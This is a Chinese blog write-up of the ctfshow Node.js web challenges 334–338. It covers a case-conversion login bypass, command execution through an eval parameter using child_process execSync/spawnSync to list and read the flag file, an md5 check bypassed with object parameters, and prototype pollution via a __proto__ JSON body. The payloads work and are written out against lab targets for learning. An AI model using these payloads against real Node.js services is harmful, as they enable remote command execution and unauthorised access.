ctfshow-web入门 nodejs篇部分题解

最新推荐文章于 2024-04-27 17:13:54 发布
最新推荐文章于 2024-04-27 17:13:54 发布
阅读量2.3k 收藏 2
点赞数 2
分类专栏: # ctfshow ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45696568/article/details/116880004
版权
ctfshow 同时被 2 个专栏收录
10 篇文章 14 订阅
订阅专栏
ctf
10 篇文章 0 订阅
订阅专栏

ctfshow

nodejs

web334

先下载附件,在user.js中发现了账号密码

module.exports = {
  items: [
    {username: 'CTFSHOW', password: '123456'}
  ]
};

开环境,直接输入账号密码是错的,具体原因在login.js

var findUser = function(name, password){
  return users.find(function(item){
    return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;
  });
};

可以得知,我们输入的name中字母全部大写后要等于CTFSHOW,并且name的值不是CTFSHOW,测试后发现name=ctfshowpassword=123456

web335

查看源码,发现有一个提示<!-- /?eval= -->

先随便传一个数字进去,发现它回显了出来,但是输入字母的时候,就显示404 找不到文件,说明这里应该执行了我们输入的内容,这里的代码可能是eval('console.log(xxx)')
在这里插入图片描述
然后执行命令:

?eval=require( 'child_process' ).execSync( 'ls' )
?eval=require( 'child_process' ).spawnSync( 'ls' ).stdout.toString()

?eval=require( 'child_process' ).execSync( 'cat fl00g.txt' )
?eval=require( 'child_process' ).spawnSync( 'cat', [ 'fl00g.txt' ] ).stdout.toString()

web336

和上题相比,有过滤,exec被过滤了,那就用第二个姿势

?eval=require( 'child_process' ).spawnSync( 'ls' ).stdout.toString()
?eval=require( 'child_process' ).spawnSync( 'cat', [ 'fl001g.txt' ] ).stdout.toString()

web337

这题给了源码

var express = require('express');
var router = express.Router();
var crypto = require('crypto');

function md5(s) {
  return crypto.createHash('md5')
    .update(s)
    .digest('hex');
}

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  var flag='xxxxxxx';
  var a = req.query.a;
  var b = req.query.b;
  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
  	res.end(flag);
  }else{
  	res.render('index',{ msg: 'tql'});
  }
  
});

module.exports = router;

简单分析,需要传入a和b,它们值互不相同,但是长度相同,并且md5(a+flag)===md5(b+flag)

前面都还,重点是最后一个,正常手段肯定是不行,那试一下数组
payload:

这里只需要满足中括号里面是字母就行,关于它们的值相不相同,长度一不一样都不重要
?a[a]=2&b[b]=2

至于为什么中括号里是数字就不行,这里参考羽师傅给出的解释

a={'x':'1'}
b={'x':'2'}

console.log(a+"flag{xxx}")
console.log(b+"flag{xxx}")
二者得出的结果都是[object Object]flag{xxx},所以md5值也相同

但是如果传a[0]=1&b[0]=2,相当于创了个变量a=[1] b=[2],再像上面那样打印的时候,会打印出1flag{xxx}2flag{xxx}

web338

这题考察的是原型链污染,我看的是羽师傅推荐的博客

题目给了源码,不过文件好像过期了,没办法了,只能看别的大佬圈出来的重点代码了

router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var secert = {};
  var sess = req.session;
  let user = {};
  utils.copy(user,req.body);
  if(secert.ctfshow==='36dboy'){
    res.end(flag);
  }else{
    return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});  
  }
});

需要满足secert.ctfshow==='36dboy',利用点在utils.copy(user,req.body);,这里的copy类似上面那篇博客中的merge,照着里面的步骤来

抓包,改参数{"username":"123","password":"123","__proto__":{"ctfshow":"36dboy"}}
在这里插入图片描述

prototype是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法
一个对象的__proto__属性,指向这个对象所在的类的prototype属性

这里污染之后,secret对象继承了Object.prototype,即secert.ctfshow==='36dboy',满足题目条件

后面几题看不到源码,暂时先不做了。

参考博客

https://blog.csdn.net/miuzzx/article/details/111780832

z.volcano
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFShow-Web入门
weixin_58546222的博客
12-15 667
CTFShow爆破解题思路
ctfshow_web入门_nodejs
qq_62989306的博客
01-21 414
javascript大小写特性、javascript的RCE、javascript变量、javascript原型链污染、ejs rce、jade原型链污染、http参数污染……
ctfshow web入门 nodejs334-338
最新发布
2301_80548709的博客
04-27 706
这题入门题,下载附件以.zip的格式打开,拿到源代码,进行代码审计,发现,按照他的逻辑.输入正确的用户名及密码即可登录,这里需要注意的是,对于这个代码的逻辑,是你输入的用户名是不能等于CTFSHOW的,所以我们输入他的小写即可,因为它后面有toUppercase()函数,会将我们输入的大写,所以不用管.js大小写特性参考。
ctfshow-Web入门-sherlock
m0_58327783的博客
04-13 511
信息泄露可以参考https://blog.csdn.net/a597934448/article/details/105431367。
ctfshow--web入门web1-web20)
qing_chuan_的博客
05-20 287
mdb文件是早期asp+access构架的数据库文件 直接查看url路径添加/db/db.mdb 下载文件通过txt打开或者通过EasyAccess.exe打开搜索flag flag{ctfshow_old_database}考察vim缓存信息泄露,直接访问url/index.php.swp 注:上面的信息泄露可以参考。在进入/admin/,要登录密码,提示说密码在页面最下方,最下方有个电话号码372619038。考察git代码泄露,直接访问url/.git/index.php。查看源代码,发现flag。
CTF-show WEB入门--web2
m0_73912575的博客
10-25 244
CTF.show WEB入门--web2 解题write up
libvirt-web-nodejs:一个基于libVirt和nodejs的简单Web界面
05-12
libVirt Webnodejs) 一个基于和简单Web界面。 该项目仍处于“进行中”状态,可能无法正常运行。 请在这种情况下创建一个问题,以便我进行跟踪和解决。 谢谢你。 如果您正在寻找PHP版本: : 。 预习 图片将...
aliyun-iot-demo-nodejs:Nodejs模拟硬件设备接入阿里云IoT物联网套件,基础版demo+高级版demo
05-18
思路:温湿度计通过MQTT协议连接到IoT套件,规则引擎针对数据上报Topic配置转发到函数计算(FunctionComputer)中编写好的函数pushData2DingTalk,函数Nodejs脚本处理数据,post到钉钉群机器人的Webhook,配置了温湿度...
spm-agent-nodejsNodeJS监视代理
02-04
spm-agent-nodejs 这是的代理。 收集以下信息并将其传输到SPM(云或本地版本): 操作系统指标(CPU /内存) 进程记忆 EventLoop统计信息 垃圾收集器统计 Web服务器统计信息(请求,错误率,响应时间等)适用于...
huaweicloud-sdk-nodejs-obs
04-29
支持初始化ObsClient时指定user_agent参数;所有接口支持返回OBS服务内部错误码Indicator;日志新增socket连接建立耗时打印;新增ObsClient.setObjectMetadata接口,用于修改对象元数据;ObsClient.putObject/...
tmdbs-web-nodejs
05-15
tmdbs-web-nodejs 一个使用Node.JS和ReactJS作为模板系统构建的电影中心。 专为学习目的而学习ReactJS。设置克隆存储库npm install-安装节点模块访问localhost:8080观看最新电影。 您将需要运行的API服务,该服务也...
ctfshow web入门 (命令执行)
m0_69289738的博客
09-04 133
这题与上题相似,多过滤了一个system和php,这题就使用反引号执行代码,因为php被过滤,所以用问号代替。使用system('ls')看到有flag.php,直接cat flag.php,查看源代码得到flag。使用system命令把flag.php记录到1.txt。输入system('ls')发现flag.php。我们使用问号代替,再次访问,拿到flag。或者tac flag.php得到flag。我们直接访问flag.php是不会显示的。发现不行,因为flag被过滤了。访问1.txt,拿到flag。
渗透测试-ctfshow 爆破(web入门
保持微笑的博客
12-29 4905
渗透测试-ctfshow 爆破(web入门
ctf.show的 node.js(web334-web342)
wanan的博客
09-30 529
ctf.show的 node.js(web334-web342)
web安全】Nodejs原型链污染分析
「 虚幻私塾」
02-14 680
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Nodejs原型链污染分析 什么是js原型? 可以将js原型理解为其他OOP语言中的类,但还是有细微区别。 1. function F(){...} 2. var f = new F(); 分析: 1.创建一个func F,同时创立了一个F对象(该对象默认是接着Object的原
ctfshow nodejs wp
yink12138的博客
01-12 376
ctfshow nodejs部分的wp
CTFshow web入门 web3
weixin_45990644的博客
07-07 656
CTFshow web入门 web3 题目提示没思路的时候进行抓一下包 这道题还可以用burpsuite来抓,但是感觉有点大才小用,直接用Network做比较简单点。
BUUCTF WEB ESAYLOGIN
qq_41696858的博客
03-15 5488
登录注册首想二次注入,但是注册成功以后发现连个回显点都没有,所以这条路就断了 然后随便注册一个账号,有个getflag按钮,点击发现权限不够。这里就想到要伪造身份绕过了 审计注册页面源码,发现/static/js/app.js目录 看看,发现hint /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ 百度一下,看看koa是个啥,原来是个nodejsweb框架 function login() { const username
Nodejs ctf 基础
qq_61768489的博客
07-23 1350
总结数字与字符串比较时,会优先将纯数字型字符串转为数字之后再进行比较;而字符串与字符串比较时,会将字符串的第一个字符转为ASCII码之后再进行比较,因此就会出现第五行代码的这种情况;总结空数组之间比较永远为false,数组之间比较只比较数组间的第一个值,对第一个值采用前面总结的比较方法,数组与非数值型字符串比较,数组永远小于非数值型字符串;数组与数值型字符串比较,取第一个之后按前面总结的方法进行比较。应该执行eval()函数,可以执行js代码,那么就可以执行系统命令了。依旧是get传eval。...
tencentcloud-sdk-nodejs-nlp怎么导入uniapp
05-18
要在uniapp中使用tencentcloud-sdk-nodejs-nlp,你可以尝试以下步骤: 1. 在你的uniapp项目中创建一个新的文件夹,例如“tencentcloud-sdk-nodejs-nlp”。 2. 在该文件夹下,创建一个新的js文件,例如“index.js”...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z.volcano

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值